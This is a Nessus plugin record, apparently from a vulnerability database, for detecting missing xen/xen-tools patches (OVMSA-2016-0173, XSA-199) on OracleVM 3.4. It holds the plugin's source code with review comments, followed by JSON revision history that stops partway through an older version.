ID ORACLEVM_OVMSA-2016-0173.NASL
Type nessus
Reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2019-12-02T00:00:00
Description
The remote OracleVM system is missing patches that address
critical security issues:
- qemu: ioport_read, ioport_write: be defensive about
  32-bit addresses master XSA-199 [OraBug: 25119498]
#
# (C) Tenable Network Security, Inc.
#
# The package checks in this plugin were extracted from OracleVM
# Security Advisory OVMSA-2016-0173.
#
include("compat.inc");
# Metadata registration: runs only when `description` is set, declares the
# plugin's identity, report text and prerequisites, then exits before any
# host data is read.
if (description)
{
  # Identity and revision.
  script_id(95620);
  script_version("3.4");
  script_cvs_date("Date: 2019/09/27 13:00:35");

  script_name(english:"OracleVM 3.4 : xen (OVMSA-2016-0173)");
  script_summary(english:"Checks the RPM output for the updated packages.");

  # Text shown in the scan report.
  script_set_attribute(attribute:"synopsis", value:"The remote OracleVM host is missing one or more security updates.");
  # The description literal spans four source lines; its continuation lines
  # stay at column 0 because any indentation would become part of the text.
  script_set_attribute(attribute:"description", value:
"The remote OracleVM system is missing necessary patches to address
critical security updates :
- qemu: ioport_read, ioport_write: be defensive about
32-bit addresses master XSA-199 [OraBug: 25119498]");

  # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html
  # NOTE(review): the short link below presumably resolves to the errata URL
  # above - confirm; the reference itself is plain http.
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6104821f");
  script_set_attribute(attribute:"solution", value:"Update the affected xen / xen-tools packages.");

  # Severity is declared only as a risk_factor string. No CVSS attribute and no
  # CVE or other cross-reference call appears in this block, so the only
  # vulnerability identifier is the "XSA-199" mention in the description text.
  # NOTE(review): tooling that correlates findings by CVE will not link this
  # plugin; triage it by advisory id (OVMSA-2016-0173 / XSA-199) instead.
  script_set_attribute(attribute:"risk_factor", value:"High");

  # Local check: it needs the KB keys required at the end of this block.
  script_set_attribute(attribute:"plugin_type", value:"local");

  # Affected packages and platform, in the order the original declares them.
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:xen");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:xen-tools");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.4");

  # Disclosure, patch and plugin release dates.
  script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/12/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/08");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"OracleVM Local Security Checks");

  # Prerequisites: ssh_get_info.nasl is declared as a dependency, and the three
  # KB keys below are required (local checks enabled, OracleVM release string,
  # installed RPM list).
  # NOTE(review): presumably ssh_get_info.nasl is what fills these keys over an
  # authenticated session - confirm; an uncredentialed scan would then never
  # reach the package comparison.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host check: confirms the target is an x86_64 OracleVM 3.4 system with a
# collected RPM list, then compares the installed xen / xen-tools packages
# against the fixed builds from OVMSA-2016-0173.

# Preconditions read from the knowledge base; each failure ends in an audit.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

release = get_kb_item("Host/OracleVM/release");
if (isnull(release) || "OVS" >!< release)
{
  audit(AUDIT_OS_NOT, "OracleVM");
}
# Accept "OVS3.4" on its own or followed by ".<digit>".
if (! preg(pattern:"^OVS" + "3\.4" + "(\.[0-9]|$)", string:release))
{
  audit(AUDIT_OS_NOT, "OracleVM 3.4", "OracleVM " + release);
}

if (!get_kb_item("Host/OracleVM/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Architecture gate: only x86_64 proceeds. A non-x86_64 value that is not
# i386..i686 gets the "not implemented" audit, any other non-x86_64 value the
# "wrong architecture" audit.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if ("x86_64" >!< cpu)
{
  if (cpu !~ "^i[3-6]86$")
  {
    audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
  }
  audit(AUDIT_ARCH_NOT, "x86_64", cpu);
}

# Package comparison. Each rpm_check() is gated by rpm_exists() on the
# "4.4.4-105" name-version prefix.
# NOTE(review): that gate appears to limit the comparison to hosts already on
# the 4.4.4-105 build line; a host on a different xen build would fall through
# to the "not affected" / "not installed" audit below - confirm against
# rpm.inc, and do not read that audit as proof that XSA-199 is fixed.
# NOTE(review): only the installed RPM list is compared; nothing here checks
# that the updated hypervisor is the one actually running.
unpatched_count = 0;
if (rpm_exists(rpm:"xen-4.4.4-105", release:"OVS3.4") && rpm_check(release:"OVS3.4", reference:"xen-4.4.4-105.0.2.1.el6"))
{
  unpatched_count++;
}
if (rpm_exists(rpm:"xen-tools-4.4.4-105", release:"OVS3.4") && rpm_check(release:"OVS3.4", reference:"xen-tools-4.4.4-105.0.2.1.el6"))
{
  unpatched_count++;
}

# At least one package is behind the fixed build: report and stop. The package
# detail from rpm_report_get() is attached only when report_verbosity > 0.
if (unpatched_count)
{
  if (report_verbosity > 0)
  {
    security_hole(port:0, extra:rpm_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}

# Nothing flagged: audit as "not affected" when pkg_tests_get() returns a
# value, otherwise as "not installed".
checked_pkgs = pkg_tests_get();
if (checked_pkgs)
{
  audit(AUDIT_PACKAGE_NOT_AFFECTED, checked_pkgs);
}
else
{
  audit(AUDIT_PACKAGE_NOT_INSTALLED, "xen / xen-tools");
}
{"id": "ORACLEVM_OVMSA-2016-0173.NASL", "bulletinFamily": "scanner", "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]", "published": "2016-12-08T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/95620", "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?6104821f"], "cvelist": [], "type": "nessus", "lastseen": "2019-12-13T08:50:10", "history": [{"lastseen": "2019-11-01T03:18:52", "edition": 9, "differentElements": ["modified"], "bulletin": {"lastseen": "2019-11-01T03:18:52", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 9, "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"modified": "2019-11-01T03:18:52", "vector": "NONE", "value": 3.4}, "dependencies": {"references": [{"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3607.NASL"], "type": "nessus"}], "modified": "2019-11-01T03:18:52"}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2019-11-02T00:00:00", "href": "https://www.tenable.com/plugins/nessus/95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - 
qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "bbab0c647b2f01faf2a161133a12fdd7", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "dc233597f3760b02c8ddebc69eee649e", "key": "description"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "64c3c860632671783599c242de75d407", "key": "href"}, {"hash": "b7beaf9d124542f914ef08e608facdab", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": 
"fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "b05be2ec4e62470dadaab06de0d7bcdba22de56399e1d54d245d206036e00600"}}, {"lastseen": "2018-11-20T07:41:11", "edition": 5, "differentElements": ["description"], "bulletin": {"lastseen": "2018-11-20T07:41:11", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 5, "reporter": "Tenable", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2018-11-19T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/11/19 16:36:34\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, 
ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "9e33ebe844d7e88ee97bfa9301de7569", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5d271ede8106ea079ca87703966309c1", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "5e9c28fb71a885719f4f0312b51c7b38", "key": "modified"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8037f56d4d98ec6b5e687bc34cd58867", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": 
"fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "1b3c699b03faf6497872a733844e5813ffc71892a22b8bd72ab5f087a4ed0ef6"}}, {"lastseen": "2019-02-21T01:28:40", "edition": 7, "differentElements": ["description", "reporter", "modified", "sourceData", "href"], "bulletin": {"lastseen": "2019-02-21T01:28:40", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 7, "reporter": "Tenable", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"modified": "2019-02-21T01:28:40", "vector": "NONE", "value": 3.5}, "dependencies": {"references": [{"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3607.NASL"], "type": "nessus"}], "modified": "2019-02-21T01:28:40"}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2018-11-19T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The 
package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/11/19 16:36:34\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "9e33ebe844d7e88ee97bfa9301de7569", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5d271ede8106ea079ca87703966309c1", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": 
"5e9c28fb71a885719f4f0312b51c7b38", "key": "modified"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8037f56d4d98ec6b5e687bc34cd58867", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "1b3c699b03faf6497872a733844e5813ffc71892a22b8bd72ab5f087a4ed0ef6"}}, {"lastseen": "2016-12-08T21:39:26", "edition": 1, "differentElements": ["sourceData"], "bulletin": {"lastseen": "2016-12-08T21:39:26", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 1, "reporter": "Tenable", "history": [], "published": "2016-12-08T00:00:00", "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.2", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-12-08T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2016/12/08 14:28:00 $\");\n\n 
script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:oracle:vm:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n 